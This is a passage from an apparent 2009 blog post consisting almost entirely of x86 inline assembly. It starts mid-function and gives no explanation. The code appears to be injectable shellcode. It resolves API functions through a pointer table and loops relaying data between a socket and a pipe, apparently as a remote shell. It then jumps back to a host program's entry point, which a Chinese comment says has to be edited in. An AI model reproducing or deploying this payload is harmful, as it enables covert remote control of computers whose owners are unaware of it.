- call dword ptr [ebp-4018h]
- loc_004011E8:
- mov eax,1
- test eax,eax
- je loc_004013C8
- push 1000h
- push 0
- lea ecx,[ebp-11E8h]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- mov dword ptr [ebp-12F4h],0
- loc_00401215:
- cmp dword ptr [ebp-12F4h],40h
- jnb loc_00401240
- mov edx,[ebp-12F4h]
- mov eax,[ebp-12F8h]
- mov [ebp+edx*4-12F0h],eax
- mov ecx,[ebp-12F4h]
- add ecx,1
- mov [ebp-12F4h],ecx
- loc_00401240:
- xor edx,edx
- test edx,edx
- jnz loc_00401215
- lea eax,[ebp-1DCh]
- push eax
- push 0
- push 0
- lea ecx,[ebp-12F4h]
- push ecx
- push 0
- call dword ptr [ebp-4040h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- je loc_00401338
- cmp dword ptr [ebp-11F0h],0FFFFFFFFh
- je loc_00401338
- lea edx,[ebp-12F4h]
- push edx
- mov eax,[ebp-12F8h]
- push eax
- call dword ptr [ebp-4034h]
- test eax,eax
- jz loc_004012B6
- push 0
- push 1000h
- lea ecx,[ebp-11E8h]
- push ecx
- mov edx,[ebp-12F8h]
- push edx
- call dword ptr [ebp-4044h]
- mov [ebp-1E8h],eax
- loc_004012B6:
- cmp dword ptr [ebp-1E8h],0
- ja loc_004012C4
- jmp loc_00401417
- loc_004012C4:
- push 0
- lea eax,[ebp-1E8h]
- push eax
- mov ecx,[ebp-1E8h]
- push ecx
- lea edx,[ebp-11E8h]
- push edx
- mov eax,[ebp-1E0h]
- push eax
- call dword ptr [ebp-401Ch]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jnz loc_004012FC
- jmp loc_00401415
- loc_004012FC:
- cmp dword ptr [ebp-11ECh],0
- jnz loc_0040132A
- push 0
- lea ecx,[ebp-1E8h]
- push ecx
- push 1
- lea edx,[ebp-1340h]
- push edx
- mov eax,[ebp-1E0h]
- push eax
- call dword ptr [ebp-401Ch]
- mov [ebp-11F0h],eax
- loc_0040132A:
- cmp dword ptr [ebp-11F0h],0
- jnz loc_00401338
- jmp loc_00401413
- loc_00401338:
- push 1000h
- push 0
- lea ecx,[ebp-11E8h]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- push 0
- lea edx,[ebp-4]
- push edx
- push 0
- push 0
- push 0
- mov eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4020h]
- cmp dword ptr [ebp-4],0
- jbe loc_004013C3
- push 0
- lea ecx,[ebp-1E8h]
- push ecx
- mov edx,[ebp-4]
- push edx
- lea eax,[ebp-11E8h]
- push eax
- mov ecx,[ebp-38h]
- push ecx
- call dword ptr [ebp-4024h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jnz loc_00401399
- jmp loc_00401411
- loc_00401399:
- push 0
- mov edx,[ebp-4]
- push edx
- lea eax,[ebp-11E8h]
- push eax
- mov ecx,[ebp-12F8h]
- push ecx
- call dword ptr [ebp-4048h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jg loc_004013C3
- jmp loc_0040140F
- loc_004013C3:
- jmp loc_004011E8
- loc_004013C8:
- mov edx,[ebp-1E0h]
- push edx
- call dword ptr [ebp-4010h]
- mov eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4010h]
- mov ecx,[ebp-2Ch]
- push ecx
- call dword ptr [ebp-4010h]
- mov edx,[ebp-34h]
- push edx
- call dword ptr [ebp-4010h]
- mov eax,[ebp-12F8h]
- push eax
- call dword ptr [ebp-403Ch]
- push 3E8h
- call dword ptr [ebp-4018h]
- jmp loc_004010F7
- loc_0040140F:
- jmp loc_004013C8
- loc_00401411:
- jmp loc_004013C8
- loc_00401413:
- jmp loc_004013C8
- loc_00401415:
- jmp loc_004013C8
- loc_00401417:
- jmp loc_004013C8
- loc_00401419:
- mov esp,ebp
- pop ebp
- ret
- }
-
- /////////////////////////////////////////////////////////////
- ex:
- _asm
- {
- pop ecx
- push ecx
- ret
- }
- ex1:
- _asm
- {
- call ex
- ret
- }
- exit1:
- ///////////////////////////////////////////////////////////////
- _asm
- {
- mov eax,0x401000 //这里需要更改为程序人口
- jmp eax
- }
- return 0;
- }
posted on
2009-06-08 00:00 Yincheng